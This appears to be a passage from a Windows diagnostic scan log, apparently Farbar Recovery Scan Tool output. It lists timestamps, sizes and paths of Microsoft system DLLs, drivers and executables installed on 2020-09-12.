2020-09-12 17:26 - 2020-09-12 17:26 - 000292864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Lights.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000285056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000283136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000277504 _____ (Microsoft Corporation) C:\Windows\system32\scecli.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000272896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstext40.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000272384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppLockerCSP.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000269824 _____ (Microsoft Corporation) C:\Windows\system32\DAFMCP.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000268800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credprovs.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000256000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcore6.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000251904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msIso.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000249856 _____ (Microsoft Corporation) C:\Windows\system32\FileHistory.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000245248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pdh.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000244736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndproxy.sys
2020-09-12 17:26 - 2020-09-12 17:26 - 000240128 _____ (Microsoft Corporation) C:\Windows\system32\ssdpsrv.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000234496 _____ (Microsoft Corporation) C:\Windows\system32\FXSCOVER.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000232960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000224064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\offlinesam.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000219136 _____ (Microsoft Corporation) C:\Windows\system32\P2P.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scecli.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000211968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFilterHost.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000211256 _____ (Microsoft Corporation) C:\Windows\system32\tcbloader.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000181248 _____ (Microsoft Corporation) C:\Windows\system32\FXSUTILITY.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InstallServiceTasks.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000170496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryUpgrade.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000165184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryClient.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\updatepolicy.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BitLockerCsp.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000160768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000155136 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\fdWSD.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000146640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000139776 _____ (Microsoft Corporation) C:\Windows\system32\Chakrathunk.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000136192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srpapi.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000133632 _____ (Microsoft Corporation) C:\Windows\system32\dnscmmc.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000127488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdWSD.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000124416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnscmmc.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000120832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000120832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000117248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakradiag.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000113152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssitlb.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000108544 _____ (Microsoft Corporation) C:\Windows\system32\fdSSDP.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000105472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakrathunk.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000099328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTimeUtil.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000093496 _____ (Microsoft Corporation) C:\Windows\system32\hvloader.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wanarp.sys
2020-09-12 17:26 - 2020-09-12 17:26 - 000090944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryBroker.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000090936 _____ (Microsoft Corporation) C:\Windows\system32\vid.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000089344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32u.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000089088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdSSDP.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000084992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\samlib.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000084280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hvservice.sys
2020-09-12 17:26 - 2020-09-12 17:26 - 000081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dtdump.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000080896 _____ (Microsoft Corporation) C:\Windows\system32\WinBioDataModelOOBE.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000078336 _____ (Microsoft Corporation) C:\Windows\system32\fhuxgraphics.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcsvc.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000068096 _____ (Microsoft Corporation) C:\Windows\system32\udhisapi.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000065536 _____ (Microsoft Corporation) C:\Windows\system32\iemigplugin.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000065024 _____ (Microsoft Corporation) C:\Windows\system32\ssdpapi.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000063488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iemigplugin.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssprxy.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000058368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\udhisapi.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000058368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcsvc6.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000056320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndiscap.sys
2020-09-12 17:26 - 2020-09-12 17:26 - 000053760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rtutils.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000050688 _____ (Microsoft Corporation) C:\Windows\system32\tar.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000050688 _____ (Microsoft Corporation) C:\Windows\system32\NAPCRYPT.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbauth.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edpnotify.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000046592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf3216.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000046080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscntrs.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000045056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000044032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NAPCRYPT.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 000043520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tar.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perfctrs.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\upnpcont.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000039424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perfproc.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perfdisk.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wslapi.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perfos.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000035328 _____ (Microsoft Corporation) C:\Windows\system32\FXSCOMPOSERES.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000032256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryCore.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmintegrator.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000029184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBrokerCookies.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perfnet.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000021304 _____ (Microsoft Corporation) C:\Windows\system32\kdhvcom.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000020992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidtel.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000016384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
2020-09-12 17:26 - 2020-09-12 17:26 - 000013824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDJPN.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 000013312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDKOR.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 000011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbd106n.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbd106.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbd101.DLL
2020-09-12 17:26 - 2020-09-12 17:26 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimg32.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6r.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2020-09-12 17:26 - 2020-09-12 17:26 - 000000315 _____ C:\Windows\system32\DrtmAuth9.bin
2020-09-12 17:26 - 2020-09-12 17:26 - 000000315 _____ C:\Windows\system32\DrtmAuth8.bin
2020-09-12 17:26 - 2020-09-12 17:26 - 000000315 _____ C:\Windows\system32\DrtmAuth7.bin
2020-09-12 17:26 - 2020-09-12 17:26 - 000000315 _____ C:\Windows\system32\DrtmAuth6.bin
2020-09-12 17:26 - 2020-09-12 17:26 - 000000315 _____ C:\Windows\system32\DrtmAuth5.bin
2020-09-12 17:26 - 2020-09-12 17:26 - 000000315 _____ C:\Windows\system32\DrtmAuth4.bin
2020-09-12 17:26 - 2020-09-12 17:26 - 000000315 _____ C:\Windows\system32\DrtmAuth3.bin
2020-09-12 17:26 - 2020-09-12 17:26 - 000000315 _____ C:\Windows\system32\DrtmAuth2.bin
2020-09-12 17:26 - 2020-09-12 17:26 - 000000315 _____ C:\Windows\system32\DrtmAuth12.bin
2020-09-12 17:26 - 2020-09-12 17:26 - 000000315 _____ C:\Windows\system32\DrtmAuth11.bin
2020-09-12 17:26 - 2020-09-12 17:26 - 000000315 _____ C:\Windows\system32\DrtmAuth10.bin
2020-09-12 17:26 - 2020-09-12 17:26 - 000000315 _____ C:\Windows\system32\DrtmAuth1.bin
2020-09-12 17:25 - 2020-09-12 17:25 - 009926456 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 007910152 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 007845080 _____ (Microsoft Corporation) C:\Windows\system32\OneCoreUAPCommonProxyStub.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 007604584 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 007582768 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 007271232 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 006233080 _____ (Microsoft Corporation) C:\Windows\system32\StartTileData.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 006170624 _____ (Microsoft Corporation) C:\Windows\system32\twinui.pcshell.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 005284328 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepository.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 005041152 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 004565248 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 004048384 _____ (Microsoft Corporation) C:\Windows\system32\SRH.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 004005888 _____ (Microsoft Corporation) C:\Windows\system32\EdgeContent.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 003805696 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 003727872 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 003714048 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 003581240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 003547136 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 003371176 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 003265024 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 003136000 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 003084800 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 002986808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 002870784 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 002774088 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 002772616 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 002711552 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 002697536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 002483712 _____ (Microsoft Corporation) C:\Windows\system32\InstallService.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 002454904 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 002291712 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.onecore.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 002260824 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 002090280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 002073600 _____ (Microsoft Corporation) C:\Windows\system32\ISM.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 002060288 _____ (Microsoft Corporation) C:\Windows\system32\cdprt.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001999968 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001942016 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001930752 _____ (Microsoft Corporation) C:\Windows\system32\dbghelp.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001918464 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001885184 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001784832 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Input.Inking.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001767424 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001751040 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.desktop.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001746232 _____ (Microsoft Corporation) C:\Windows\system32\ContentDeliveryManager.Utilities.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001743680 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001726264 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001704960 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001698816 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001688064 _____ (Microsoft Corporation) C:\Windows\system32\XpsPrint.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001670144 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001653792 _____ (Microsoft Corporation) C:\Windows\system32\gdi32full.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001522176 _____ (Microsoft Corporation) C:\Windows\system32\WindowManagement.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001499136 _____ (Microsoft Corporation) C:\Windows\system32\TokenBroker.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001486848 _____ (Microsoft Corporation) C:\Windows\system32\usocoreworker.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 001485824 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.Vpn.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001480520 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 001399216 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001393960 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001274128 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryPS.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001260752 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001182720 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001182208 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.Web.Core.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001170960 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001149712 _____ (Microsoft Corporation) C:\Windows\system32\ApplyTrustOffline.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 001141048 _____ (Microsoft Corporation) C:\Windows\system32\efscore.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001092096 _____ (Microsoft Corporation) C:\Windows\system32\MusUpdateHandlers.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 001008952 _____ (Microsoft Corporation) C:\Windows\system32\CloudExperienceHostCommon.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000981320 _____ (Microsoft Corporation) C:\Windows\system32\WWAHost.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000978232 _____ (Microsoft Corporation) C:\Windows\system32\PCPKsp.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000944680 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000932352 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000932256 _____ (Microsoft Corporation) C:\Windows\system32\SecurityHealthService.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000893104 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000874296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000858928 _____ (Microsoft Corporation) C:\Windows\system32\CoreMessaging.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000851968 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000842240 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Language.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000841216 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000823752 _____ (Microsoft Corporation) C:\Windows\system32\fontdrvhost.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000822784 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000817152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000777216 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000750080 _____ (Microsoft Corporation) C:\Windows\system32\ActivationManager.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000722072 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000716304 _____ (Microsoft Corporation) C:\Windows\system32\StateRepository.Core.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000675840 _____ (Microsoft Corporation) C:\Windows\system32\daxexec.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000661832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000648192 _____ (Microsoft Corporation) C:\Windows\system32\cdpsvc.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000621568 _____ (Microsoft Corporation) C:\Windows\system32\MusNotification.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000602112 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Payments.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000578560 _____ (Microsoft Corporation) C:\Windows\system32\SppExtComObj.Exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000578048 _____ (Microsoft Corporation) C:\Windows\system32\ddraw.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000561464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000555320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Vid.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000550400 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000544336 _____ (Microsoft Corporation) C:\Windows\system32\policymanager.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000544256 _____ (Microsoft Corporation) C:\Windows\system32\usosvc.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000533504 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000530432 _____ (Microsoft Corporation) C:\Windows\system32\MusNotificationUx.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000525824 _____ (Microsoft Corporation) C:\Windows\system32\sppcext.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000521728 _____ (Microsoft Corporation) C:\Windows\system32\cdpusersvc.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000516608 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000510792 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000506880 _____ (Microsoft Corporation) C:\Windows\system32\InputSwitch.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000492032 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000477496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2020-09-12 17:25 - 2020-09-12 17:25 - 000460192 _____ (Microsoft Corporation) C:\Windows\system32\MusNotifyIcon.exe
2020-09-12 17:25 - 2020-09-12 17:25 - 000457016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\edgeIso.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000441152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2020-09-12 17:25 - 2020-09-12 17:25 - 000435200 _____ (Microsoft Corporation) C:\Windows\system32\wincorlib.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000434176 _____ (Microsoft Corporation) C:\Windows\system32\MicrosoftAccountExtension.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000419328 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Lights.dll
2020-09-12 17:25 - 2020-09-12 17:25 - 000401408 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
